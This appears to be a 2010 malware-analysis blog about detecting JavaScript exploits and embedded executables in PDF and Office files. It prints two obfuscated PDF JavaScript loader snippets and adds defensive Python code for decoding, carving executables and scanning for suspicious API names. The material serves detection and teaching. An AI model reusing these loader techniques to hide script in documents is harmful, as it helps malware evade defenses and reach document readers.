Thursday, April 8, 2010

View detection hits as hexdump on ViCheck.ca

For recently analyzed reports, we've added a Beta Analysis Report, linked from the regular report page, where you can view hexdumps of the exploits or embedded executables:
Detect JavaScript exploits in PDF files, or executables embedded in MS Office exploits in .doc, .xls and .ppt files, on ViCheck.ca.

Wednesday, February 17, 2010

More fun with PDF Obfuscation

Another interesting way to hide a block of JavaScript inside a PDF, this time in info.Trailer:

exmu='dmw';if(app.alert)exmu='';WmMw=this;zisc=WmMw.info;exmu=exmu+unescape('%')+exmu;y1vw=zisc.Trailer.replace(/([A-Z])/g,exmu);app.setTimeOut(unescape(y1vw),3)

Monday, February 15, 2010

Shellcode Detection Tool

New web tool: paste your hex straight from a hex editor into the Decoder Tool and select "Detect as shellcode" to run a libemu detection scan. It also decodes various JavaScript obfuscation methods such as fromCharCode, Unicode escapes and regular hex escaping.
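To show what the decoding half of such a tool has to do, here is an added Python example (not the ViCheck Decoder Tool's code) that strips the layers listed above, fromCharCode, \uXXXX, \xNN and %XX / %uXXXX escapes, and repeats until nothing changes, since samples stack them (a fromCharCode call that yields %XX text which is then unescaped). The function names, the indicator list and the sample string are assumptions of this example:

```python
import re

# Added example, not the ViCheck Decoder Tool: undo the common JavaScript
# string-obfuscation layers so hidden API calls become readable.

_FROMCHARCODE = re.compile(r"String\.fromCharCode\s*\(([^()]*)\)")
_UNICODE = re.compile(r"\\u([0-9a-fA-F]{4})")
_HEX = re.compile(r"\\x([0-9a-fA-F]{2})")
_PERCENT = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")


def decode_fromcharcode(js: str) -> str:
    """Replace String.fromCharCode(0x61, 112, ...) with a quoted literal.
    Calls whose arguments are not plain numbers (variables, expressions)
    are left untouched rather than guessed at."""
    def repl(m: re.Match) -> str:
        try:
            chars = [chr(int(t.strip(), 0)) for t in m.group(1).split(",") if t.strip()]
        except ValueError:
            return m.group(0)
        return '"' + "".join(chars) + '"'
    return _FROMCHARCODE.sub(repl, js)


def decode_unicode_escapes(js: str) -> str:
    """\\u0065 -> 'e'."""
    return _UNICODE.sub(lambda m: chr(int(m.group(1), 16)), js)


def decode_hex_escapes(js: str) -> str:
    """\\x65 -> 'e'."""
    return _HEX.sub(lambda m: chr(int(m.group(1), 16)), js)


def decode_percent_escapes(js: str) -> str:
    """Mimic JavaScript unescape(): %uXXXX first, then %XX."""
    return _PERCENT.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), js)


LAYERS = (decode_fromcharcode, decode_unicode_escapes,
          decode_hex_escapes, decode_percent_escapes)


def decode_all(js: str, max_rounds: int = 8) -> str:
    """Apply every layer repeatedly until a pass changes nothing."""
    for _ in range(max_rounds):
        out = js
        for layer in LAYERS:
            out = layer(out)
        if out == js:
            return out
        js = out
    return js


# API names worth flagging once the text is readable (from the posts on this page)
SUSPICIOUS = ("eval", "unescape", "app.setTimeOut", "syncAnnotScan",
              "getAnnots", "media.newPlayer")


def indicators(js: str) -> list:
    """Return the suspicious API names visible after decoding."""
    decoded = decode_all(js)
    return [name for name in SUSPICIOUS if name in decoded]


if __name__ == "__main__":
    # Constructed sample: fromCharCode yields "%65%76%61%6c", which then unescapes to "eval"
    sample = ("var f = String.fromCharCode(37,54,53,37,55,54,37,54,49,37,54,99); "
              "var g = \\u0061\\u0070\\u0070;")
    print(decode_all(sample))   # var f = "eval"; var g = app;
    print(indicators(sample))   # ['eval']
```

Note what this does not catch: the samples on this page build names by concatenation (`'ev' + 'al'`, `'unes' + 'cape'`), which no escape decoder unwinds; that is exactly why the emulation-based detection the tool offers alongside decoding matters.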

Executable extraction from documents

New feature in beta: extraction of EXE files and embedded documents. Check the bottom of the report page for a list of embedded files. The MD5s may differ from those of the actual dropped files, as any whitespace at the end of the EXEs won't be included.
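The hash caveat above is easier to see with a carver in hand. The following Python is an added example, not ViCheck's extractor: it locates PE images in an arbitrary blob by following MZ, e_lfanew and the PE signature, sizes each one from its section table (the furthest PointerToRawData + SizeOfRawData), hashes exactly those bytes, and then hashes again with any whitespace run that follows, which is the hash a dropper that writes the padding too would produce. The PE-shaped stub and the carrier document are constructed for the example and are not executable code; all function names are assumptions:

```python
import hashlib
import struct

# Added example, not ViCheck's extractor: carve PE executables out of a
# document blob and show why a carved hash can differ from the dropped file's.

WHITESPACE = b" \t\r\n"


def find_pe_offsets(blob: bytes):
    """Yield offsets of MZ headers whose e_lfanew points at a PE signature."""
    off = blob.find(b"MZ")
    while off != -1:
        if off + 0x40 <= len(blob):
            e_lfanew = struct.unpack_from("<I", blob, off + 0x3C)[0]
            pe = off + e_lfanew
            if 0x40 <= e_lfanew < 0x1000 and blob[pe:pe + 4] == b"PE\0\0":
                yield off
        off = blob.find(b"MZ", off + 1)


def pe_size(blob: bytes, off: int) -> int:
    """On-disk size from the section table: the furthest PointerToRawData +
    SizeOfRawData, or at least the headers; capped at the end of the blob."""
    limit = len(blob) - off
    try:
        pe = off + struct.unpack_from("<I", blob, off + 0x3C)[0]
        nsections = struct.unpack_from("<H", blob, pe + 6)[0]
        opt_size = struct.unpack_from("<H", blob, pe + 20)[0]
        table = pe + 24 + opt_size
        end = (table - off) + nsections * 40
        for i in range(nsections):
            # SizeOfRawData at +16, PointerToRawData at +20 in each 40-byte header
            raw_size, raw_ptr = struct.unpack_from("<II", blob, table + i * 40 + 16)
            end = max(end, raw_ptr + raw_size)
    except struct.error:
        return limit                       # truncated header: take everything that is left
    return min(end, limit)


def carve(blob: bytes) -> list:
    """Return (offset, size, md5) for each embedded PE, hashing exactly the
    bytes the PE headers account for."""
    found = []
    for off in find_pe_offsets(blob):
        size = pe_size(blob, off)
        found.append((off, size, hashlib.md5(blob[off:off + size]).hexdigest()))
    return found


def md5_with_trailing_whitespace(blob: bytes, off: int, size: int) -> str:
    """Hash the carved bytes plus any whitespace run that follows them."""
    end = off + size
    while end < len(blob) and blob[end] in WHITESPACE:
        end += 1
    return hashlib.md5(blob[off:end]).hexdigest()


def build_fake_pe(payload: bytes = b"constructed test section data") -> bytes:
    """Constructed PE-shaped stub (not runnable code): MZ header, COFF header
    with one section and no optional header, one section header, raw data."""
    pe_off = 0x40
    opt_size = 0
    data_off = pe_off + 24 + opt_size + 40
    mz = bytearray(b"MZ" + b"\0" * 62)
    struct.pack_into("<I", mz, 0x3C, pe_off)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x0102)
    section = b".data".ljust(8, b"\0") + struct.pack(
        "<IIIIIIHHI", len(payload), 0x1000, len(payload), data_off, 0, 0, 0, 0, 0x40000040)
    return bytes(mz) + coff + section + payload


def build_sample_document(pe: bytes) -> bytes:
    """Constructed carrier: text before the PE and whitespace padding after it."""
    return b"%constructed document header%\n" + pe + b"\r\n\r\n    " + b"%constructed trailer%\n"


if __name__ == "__main__":
    pe = build_fake_pe()
    doc = build_sample_document(pe)
    for off, size, digest in carve(doc):
        print(f"PE at {off:#x}, {size} bytes, md5 {digest}")
        print("with trailing whitespace:", md5_with_trailing_whitespace(doc, off, size))
```

When matching a report's MD5 against a file pulled from an infected host, compare both values, or strip trailing whitespace from the dropped file before hashing.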

Thursday, February 11, 2010

PDF JavaScript Obfuscation

Here's a quick note on an emerging JavaScript obfuscation technique: using getAnnots and syncAnnotScan to iterate through FlateDecode blocks which contain raw encoded data. Inside the encoded data is usually packed, obfuscated JavaScript carrying some recent exploit.

var z; var y; z = y = app.doc;
y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, 'a%b'.replace(/[ab]/g, ''));s = this['unes' + 'cape'] (l) ;var e = app['ev' + 'al']; e(s); s = ''; z = 1;
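Both this sample and the info.Trailer one in the Feb 17 post keep the payload where a plain grep for /JavaScript won't see it: inside a deflated stream, or in an Info dictionary entry. The following Python is an added example, not ViCheck's engine: it inflates FlateDecode streams, checks the raw file and the decoded data for the API names these samples use, and prints each hit as a hexdump of its surroundings (the same view the Beta Analysis Report in the April 8 post gives). The indicator list, the tiny constructed PDF and the function names are assumptions of this example; it is a regex-level triage aid, not a PDF parser.

```python
import re
import zlib

# Added example, not ViCheck's engine: find JavaScript-related indicators in a
# PDF, inside inflated FlateDecode streams and in the raw file (which covers
# strings in the Info dictionary), and show each hit as a hexdump.

INDICATORS = [
    b"/JavaScript", b"/JS", b"/OpenAction",      # where JS normally hangs off
    b"syncAnnotScan", b"getAnnots",               # annotation walk from the Feb 11 sample
    b"/Trailer", b".Trailer",                     # custom Info key read by the Feb 17 sample
    b"app.setTimeOut", b"unescape(", b"eval(",    # the usual decode-and-run pair
    b"media.newPlayer",                           # exploit target named in the Jan 13 post
]

STREAM_RE = re.compile(rb"<<(.*?)>>\s*stream\r?\n(.*?)\r?\nendstream", re.S)


def inflate(raw: bytes) -> bytes:
    """Inflate a FlateDecode stream; a truncated or corrupt stream still yields
    whatever prefix decodes, since samples are often deliberately damaged."""
    try:
        return zlib.decompress(raw)
    except zlib.error:
        try:
            return zlib.decompressobj().decompress(raw)
        except zlib.error:
            return b""


def hexdump(data: bytes, base: int = 0, width: int = 16) -> str:
    """Classic offset / hex / ASCII dump, offsets relative to `base`."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hexpart = " ".join(f"{b:02x}" for b in chunk)
        ascii_part = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{base + off:08x}  {hexpart:<{width * 3 - 1}}  |{ascii_part}|")
    return "\n".join(lines)


def _find_all(haystack: bytes, where: str, hits: list) -> None:
    for ind in INDICATORS:
        for m in re.finditer(re.escape(ind), haystack):
            start = max(0, m.start() - 8)
            hits.append({
                "where": where,
                "indicator": ind.decode(),
                "offset": m.start(),
                "context": haystack[start:m.start() + 24],
                "context_offset": start,
            })


def scan_pdf(pdf: bytes) -> list:
    """Return indicator hits from the raw file and from every inflated stream.
    Offsets inside a stream are relative to the decoded data."""
    hits = []
    _find_all(pdf, "raw", hits)
    for m in STREAM_RE.finditer(pdf):
        if b"/FlateDecode" not in m.group(1):
            continue                  # uncompressed streams were covered by the raw pass
        _find_all(inflate(m.group(2)), f"stream@{m.start(2):#x}", hits)
    return hits


def report(pdf: bytes) -> str:
    out = []
    for h in scan_pdf(pdf):
        out.append(f"[{h['where']}] {h['indicator']} at offset {h['offset']:#x}")
        out.append(hexdump(h["context"], h["context_offset"]))
    return "\n".join(out)


def build_sample_pdf() -> bytes:
    """Constructed, non-functional PDF: one FlateDecode stream carrying the
    annotation-walk API names, and an Info dictionary with a custom Trailer key."""
    js = b"var z = app.doc; z.syncAnnotScan(); var p = z.getAnnots({nPage: 0});"
    body = zlib.compress(js)
    return (b"%PDF-1.4\n1 0 obj\n<< /Length " + str(len(body)).encode()
            + b" /Filter /FlateDecode >>\nstream\n" + body + b"\nendstream\nendobj\n"
            + b"trailer\n<< /Info << /Title (constructed sample) /Trailer (AxAyAz) >> >>\n%%EOF\n")


if __name__ == "__main__":
    print(report(build_sample_pdf()))
```

The concatenated names in the sample above (`'unes' + 'cape'`, `app['ev' + 'al']`) are invisible to this kind of matching, which is why the annotation-walk calls themselves, rarely seen in benign documents, are the better thing to key on.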

Wednesday, January 13, 2010

Our new blog

Welcome to the ViCheck blog. We're hoping to use this forum for updates on the malware analysis scene. Current trends show a rise in document-format malware; viruses embedded in Adobe PDF or MS Office documents are difficult to detect. Our malware analysis engine at ViCheck.ca can detect current PDF exploits (media.newPlayer being the current favorite), as well as executables embedded in documents.

Yesterday's Google blog post has again highlighted the risks of PDF-based malware to private corporations, governments, and human rights groups. To reduce the risk from this type of malware, JavaScript can be disabled in Acrobat Reader.

Recent ViCheck analysis reports of malware, including PDF viruses, can be accessed from our website.